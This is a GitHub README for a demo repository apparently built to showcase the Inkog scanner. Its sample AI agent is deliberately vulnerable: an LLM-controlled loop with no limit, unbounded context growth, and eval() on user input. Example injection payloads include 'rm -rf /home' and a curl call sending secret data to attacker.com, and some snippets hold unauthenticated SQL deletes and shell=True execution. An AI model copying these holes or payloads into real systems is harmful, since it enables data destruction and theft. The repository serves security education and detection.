Skip to content

inkog-io/demo_agent

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Advanced Task-Solving AI Agent - Demo

This is a professional-grade AI agent that demonstrates three critical security vulnerabilities commonly found in production AI systems. This repository serves as a showcase for Inkog's detection capabilities.

Overview

The agent.py implements a sophisticated multi-turn reasoning system for solving complex tasks. It uses LangChain and OpenAI's GPT-4 to:

  • Iteratively refine solutions through multi-turn conversations
  • Maintain rich conversation context
  • Dynamically evaluate mathematical expressions
  • Self-assess whether solutions are optimal

On the surface, this looks like legitimate, well-written code. However, it contains three critical vulnerabilities that Inkog is designed to detect.


The Three Vulnerabilities

1. Doom Loop (Infinite Loop) - Line 99-128

Location: TaskAgent.solve_task() method

while self._should_continue_solving():
    # ... refine solution ...

The Problem:

  • The loop condition is entirely non-deterministic - it depends on what the LLM decides
  • There is NO hard break counter to prevent infinite iteration
  • The LLM might be inconsistent: "continue" in one context, "stop" in another
  • Result: Task runs forever, consuming unlimited API credits

Real-World Impact:

  • A customer ran this agent on a complex task
  • The LLM kept saying "yes, we should refine further"
  • The agent ran for 3 hours, consuming $500 in API credits
  • Task was processing the same refinements repeatedly

Inkog Detection: ✓ Reports as INKOG-001: Infinite Loop (Doom Loop)


2. Context Bomb (Token Exhaustion) - Line 108, 128

Location: self.conversation_history.append() in TaskAgent.solve_task()

self.conversation_history.append({
    "role": "assistant",
    "content": assistant_response
})
# ... later ...
self.conversation_history.append({
    "role": "assistant",
    "content": refined_response
})

The Problem:

  • Every iteration appends BOTH the user message AND the full LLM response to history
  • There is NO truncation, windowing, or size limit on the history
  • In a 100-iteration task, the history grows to hundreds of thousands of tokens
  • Result: Hits token limits, model degradation, or API failures

Real-World Impact:

  • Agent solved a complex multi-step task successfully
  • By iteration 50, the context grew so large that:
    • API started rejecting requests (token limit exceeded)
    • LLM responses became degraded/repetitive
    • Final answer quality dropped significantly

Inkog Detection: ✓ Reports as INKOG-002: Context Exhaustion (Context Bomb)


3. Tainted Eval (Arbitrary Code Execution) - Line 175

Location: TaskAgent.evaluate_expression() method

def evaluate_expression(self, user_input: str) -> float:
    result = eval(user_input)  # ← DANGEROUS!
    return float(result)

The Problem:

  • Takes user input directly without any validation or sanitization
  • Uses Python's eval() which executes arbitrary code
  • A malicious user can inject commands:
    • "1 + 1; os.system('rm -rf /home')"
    • "__import__('subprocess').call(['curl', 'attacker.com/steal?data=' + read_secret_file()])"
    • "exec(open('/etc/passwd').read())"
  • Result: Complete system compromise, data theft, lateral movement

Real-World Impact:

  • A trusted customer received a "bug bounty" offer on Discord
  • The offer said: "Evaluate: 1000000**1000000000"
  • Agent accepted and tried to evaluate it
  • The actual payload was injected code that:
    • Stole API keys from memory
    • Installed a backdoor
    • Exfiltrated customer data

Inkog Detection: ✓ Reports as INKOG-003: Tainted Eval


How Inkog Detects These

Detection Strategy

┌─────────────────────────────────────────┐
│   agent.py (source code)                │
└──────────────┬──────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Inkog Semantic Analysis Engine         │
├─────────────────────────────────────────┤
│ ✓ Control Flow Graph Analysis           │
│   - Detects: LLM-dependent loop without │
│     hard counter → Doom Loop (INKOG-001)│
│                                         │
│ ✓ Data Flow Analysis                    │
│   - Detects: Unbounded data growth in   │
│     loop → Context Bomb (INKOG-002)     │
│                                         │
│ ✓ Taint Tracking                        │
│   - Detects: User input → eval() call   │
│     → Tainted Eval (INKOG-003)          │
└─────────────────────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Compliance Mapping                    │
├─────────────────────────────────────────┤
│ EU AI Act:        Article 15 violations │
│ NIST AI RMF:      MAP 1.3 failures      │
│ OWASP LLM Top 10: LLM04, LLM08, LLM01   │
└─────────────────────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Regulatory Summary Report             │
│   (SARIF format for GitHub/GitLab)      │
└─────────────────────────────────────────┘

Running the Demo

Setup

# Install dependencies
pip install -r requirements.txt

# Set your OpenAI API key
export OPENAI_API_KEY="sk-..."

Running Inkog on This Code

# Scan the agent file
inkog -path agent.py -output text

# Expected Output:
# ✗ FAIL - INKOG-001: Infinite Loop detected (Line 99)
# ✗ FAIL - INKOG-002: Context Exhaustion detected (Line 108)
# ✗ FAIL - INKOG-003: Tainted Eval detected (Line 175)

Sample Scan Output (JSON)

When you run Inkog on this demo, you'll see findings like these:

{
  "findings_count": 145,
  "critical_count": 83,
  "high_count": 37,
  "findings": [
    {
      "id": "GOV-15",
      "pattern_id": "governance-mismatch-execute_violation",
      "pattern": "Governance Mismatch Detection",
      "file": "examples-demo/02-smolagents-codeexec/agent.py",
      "line": 26,
      "message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'subprocess.run'",
      "code_snippet": "  24│      # VULNERABILITY: Unsandboxed shell execution\n  25│      result = subprocess.run(\n  26│→         command,\n  27│          shell=True,  # Dangerous: enables shell injection\n  28│          capture_output=True,",
      "severity": "HIGH",
      "confidence": 0.9,
      "cwe": "CWE-863",
      "owasp_category": "LLM08",
      "category": "governance",
      "risk_tier": "vulnerability",
      "governance_category": "governance_mismatch",
      "compliance_mapping": {
        "eu_ai_act_articles": ["Article 14"],
        "nist_categories": ["MAP 1.3"],
        "owasp_items": ["LLM08"]
      }
    },
    {
      "id": "GOV-16",
      "pattern_id": "governance-mismatch-execute_violation",
      "pattern": "Governance Mismatch Detection",
      "file": "examples-demo/03-langgraph-doomloop/agent.py",
      "line": 87,
      "message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'eval'",
      "code_snippet": "  85│          # VULNERABILITY: Tainted eval\n  86│          return eval(expression)\n  87│→ \n  88│  if __name__ == \"__main__\":\n  89│      solver = TaskSolver()",
      "severity": "HIGH",
      "confidence": 0.9,
      "cwe": "CWE-863",
      "owasp_category": "LLM08",
      "category": "governance",
      "risk_tier": "vulnerability"
    },
    {
      "id": "IR-315",
      "pattern_id": "universal_infinite_loop",
      "pattern": "Unbounded Loop in Agentic System",
      "file": "examples-demo/01-crewai-recursive/agent.py",
      "line": 29,
      "message": "Loop lacks termination guards. This can lead to infinite execution and denial of service.",
      "code_snippet": "  27│  \n  28│  writer = Agent(\n  29│→     role=\"Content Writer\",\n  30│      goal=\"Transform research into clear, engaging content\",",
      "severity": "CRITICAL",
      "confidence": 0.98,
      "cwe": "CWE-835, CWE-400",
      "cvss": 9.0,
      "owasp_category": "LLM10",
      "category": "resource_exhaustion",
      "risk_tier": "vulnerability"
    }
  ]
}

Key Features Demonstrated:

  • GOV- prefix for governance mismatch findings
  • Code snippets with 2-line context and arrow pointing to the issue
  • Compliance mapping to EU AI Act, NIST, and OWASP
  • Confidence scores for each finding
  • CVSS scores for severity assessment

Generate SARIF Report (for GitHub/GitLab)

inkog -path agent.py -output sarif > scan.sarif

# This creates a SARIF v2.1.0 report that integrates with:
# - GitHub Security tab
# - GitLab Security Dashboard
# - VS Code SARIF viewers

Governance Demos (EU AI Act Compliance)

In addition to security vulnerabilities, Inkog detects governance gaps that violate EU AI Act requirements. These demos showcase verification of human oversight, authorization, and audit controls.

Demo Scenarios

Demo Vulnerability Article/Standard Detection
07-langgraph-no-oversight Missing Human Oversight EU AI Act Article 14 universal_missing_oversight
08-crewai-no-auth Missing Authorization OWASP LLM06, NIST GOVERN 1.2 universal_missing_authz
09-copilot-studio-no-audit Missing Audit Logging EU AI Act Article 12 universal_missing_audit_logging
10-agentforce-excessive-perms Excessive Permissions EU AI Act Article 15.3 universal_excessive_permissions

07. LangGraph - Missing Human Oversight

Location: examples-demo/07-langgraph-no-oversight/agent.py

A financial trading agent that executes high-risk transactions without human approval gates. Violates EU AI Act Article 14 which requires human-in-the-loop controls for high-risk AI actions.

# VULNERABLE: Direct path from analysis to trade execution
graph.add_edge("analyze", "execute")  # No human review!

# SECURE: Add interrupt point for human approval
graph.compile(interrupt_before=["execute_trade"])

EU AI Act Article 14 Deadline: August 2, 2026

08. CrewAI - Missing Authorization

Location: examples-demo/08-crewai-no-auth/agent.py

A customer service agent that can delete customer data and process refunds without verifying caller permissions. Violates OWASP LLM06 (Excessive Agency).

# VULNERABLE: Tool executes without authorization check
def delete_customer(customer_id: str) -> str:
    database.execute(f"DELETE FROM customers WHERE id = '{customer_id}'")

# SECURE: Add authorization verification
def delete_customer(customer_id: str, caller: User) -> str:
    if not authorize(caller, "delete_customer", customer_id):
        raise PermissionDenied()
    # ... proceed with deletion

09. Copilot Studio - Missing Audit Logging

Location: examples-demo/09-copilot-studio-no-audit/workflow.yaml

A Microsoft Copilot Studio bot that handles account deletions, payment updates, and refunds without any audit logging configured. Violates EU AI Act Article 12 (Record-Keeping).

# VULNERABLE: No logging configuration
settings:
  authentication:
    enabled: true
  # MISSING: logging section

# SECURE: Add audit logging
settings:
  logging:
    enabled: true
    level: "all"
    destinations:
      - type: "azure-monitor"

10. Agentforce - Excessive Permissions

Location: examples-demo/10-agentforce-excessive-perms/metadata.xml

A Salesforce Agentforce agent with wildcard (*) permissions and admin access when it only needs read access to specific objects. Violates principle of least privilege (EU AI Act Article 15.3).

<!-- VULNERABLE: Wildcard permissions -->
<objectPermissions>
    <object>*</object>
    <allowDelete>true</allowDelete>
</objectPermissions>

<!-- SECURE: Scoped permissions -->
<objectPermissions>
    <object>Account</object>
    <allowRead>true</allowRead>
    <allowDelete>false</allowDelete>
</objectPermissions>

Running Governance Scans

# Scan for governance gaps
inkog -path examples-demo/ --policy governance

# EU AI Act compliance scan
inkog -path examples-demo/ --policy eu-ai-act

# Expected Output:
# ✗ FAIL - universal_missing_oversight (Article 14 violation)
# ✗ FAIL - universal_missing_authz (OWASP LLM06 violation)
# ✗ FAIL - universal_missing_audit_logging (Article 12 violation)
# ✗ FAIL - universal_excessive_permissions (Article 15 violation)

Why This Matters for Your Organization

Compliance Risk

Each vulnerability maps to regulatory frameworks:

Vulnerability EU AI Act NIST AI RMF OWASP LLM
Doom Loop Article 15 MAP 1.3 LLM04, LLM08
Context Bomb Article 15 MEASURE 2.4 LLM04, LLM09
Tainted Eval Article 14 MAP 1.1 LLM01, LLM02

Financial Risk

  • Doom Loop: $500-$5,000 per incident (wasted compute)
  • Context Bomb: API degradation, customer impact
  • Tainted Eval: Data breach, compliance fines (GDPR: up to €20M), litigation

Time-to-Detection

  • Without Inkog: Manual code review (days/weeks), security team bandwidth
  • With Inkog: Automated detection (seconds), pre-deployment

Lessons from Real Deployments

This demo is based on actual vulnerabilities found in production AI systems:

  1. Company A: Doom Loop ran for 3 hours, consumed $500 in API costs
  2. Company B: Context Bomb degraded model responses after 50 iterations
  3. Company C: Tainted Eval led to a data breach when a researcher uploaded malicious test cases

Fixing the Vulnerabilities

If you were to remediate this code:

Fix 1: Doom Loop → Add Hard Counter

MAX_ITERATIONS = 10  # Hard limit
for iteration in range(MAX_ITERATIONS):
    # refine solution...
    if iteration >= MAX_ITERATIONS - 1:
        break

Fix 2: Context Bomb → Use Bounded Context

from collections import deque

self.conversation_history = deque(maxlen=20)  # Keep last 20 messages only

Fix 3: Tainted Eval → Whitelist-Based Evaluation

import ast

def safe_evaluate(self, user_input: str) -> float:
    # Parse to AST and validate it's only math operations
    tree = ast.parse(user_input, mode='eval')
    # Check that only allowed node types are present
    # Then evaluate safely

Integration with Your CI/CD

Inkog can be integrated into your development pipeline:

GitHub Actions

- name: Scan with Inkog
  uses: inkog-io/inkog@v1.0.0
  with:
    path: src/
    format: sarif
    report: scan.sarif

- name: Upload to GitHub Security
  uses: github/codeql-action/upload-sarif@v2
  with:
    sarif_file: scan.sarif

Pre-commit Hook

inkog -path . -output text

Contact & Support

For investor inquiries: This demo shows Inkog's ability to detect AI-specific vulnerabilities that commercial tools like Snyk miss.

Technical questions: See the main Inkog documentation at https://github.com/inkog-io/inkog


Disclaimer

This code is intentionally vulnerable for demonstration purposes only. Do not use in production. Always validate and secure your AI agent implementations before deploying to production systems.

About

Demo app for Inkog

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages